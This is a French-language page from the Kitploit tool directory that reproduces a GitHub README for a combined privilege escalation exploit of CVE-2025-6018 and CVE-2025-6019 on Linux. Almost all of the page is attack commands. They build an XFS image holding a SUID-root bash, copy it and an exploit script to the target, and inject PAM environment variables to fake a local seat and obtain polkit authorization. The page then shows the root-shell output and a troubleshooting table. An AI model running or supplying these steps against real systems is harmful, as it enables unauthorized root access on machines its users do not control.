Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit — CVE-2025-6018 + CVE-2025-6019 Exploit d'élévation de privilèges | Kitploit
Outils/GitHubGitHub/muyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionRed TeamingExploitation de Binaires
GitHubmuyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

CVE-2025-6018 + CVE-2025-6019 Exploit d'élévation de privilèges

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1212il y a 7 moisPas encore vérifié

CVE-2025-6018 + CVE-2025-6019 Guide d'élévation de privilèges

English

📋 Étapes d'exploitation rapides

Étape 1 : Préparer l'image XFS (Machine locale)

root@kitploit:~
# Créer une image XFS de 300 Mo
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Monter et installer le SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Vérifier (devrait afficher 300M)
ls -lh xfs.image

Étape 2 : Transférer les fichiers vers la cible

root@kitploit:~
# Transférer le script d'exploit et l'image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

Étape 3 : Première connexion - Configurer PAM

root@kitploit:~
# Connexion SSH à la cible
ssh [email protected]

# Écrire les variables d'environnement PAM
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Vérifier la configuration
cat ~/.pam_environment

# 🔥 Critique : Se déconnecter (pour activer la config PAM)
exit

Étape 4 : Deuxième connexion - Exécuter l'élévation de privilèges

root@kitploit:~
# Re-connexion via SSH (la config PAM est maintenant active)
ssh [email protected]

# Vérifier que PAM est actif (devrait retourner "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Exécuter le script d'élévation de privilèges
bash exp.sh

✅ Indicateurs de succès

Si l'exploitation réussit, vous devriez voir :

root@kitploit:~
✓ SUID bash trouvé : /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Accès root confirmé !

════════════════════════════════════════════════════════════
║ DRAPEAU ROOT                                            ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 Dépannage

ProblèmeSolution
retourne

📌 Points clés

  • ✅ Doit se déconnecter et se reconnecter : La config PAM ne prend effet que dans les nouvelles sessions
  • ✅ Vérifier CanReboot : Confirmez qu'elle retourne ('yes',) avant d'exécuter le script
  • ✅ Utiliser une connexion SSH : N'utilisez pas l'exécution de type ssh -t user@host "cmd"

🐱 Gardien du chat

Si cela échoue, assurez-vous que chaque étape est exécutée strictement dans l'ordre !

Télécharger l’outil
CanReboot
('no',)
Assurez-vous de vous être déconnecté puis reconnecté (Étape 3)
Erreur Not authorizedVérifiez que le contenu de ~/.pam_environment est correct
SUID bash introuvableRe-transférez xfs.image et vérifiez que le bit SUID est défini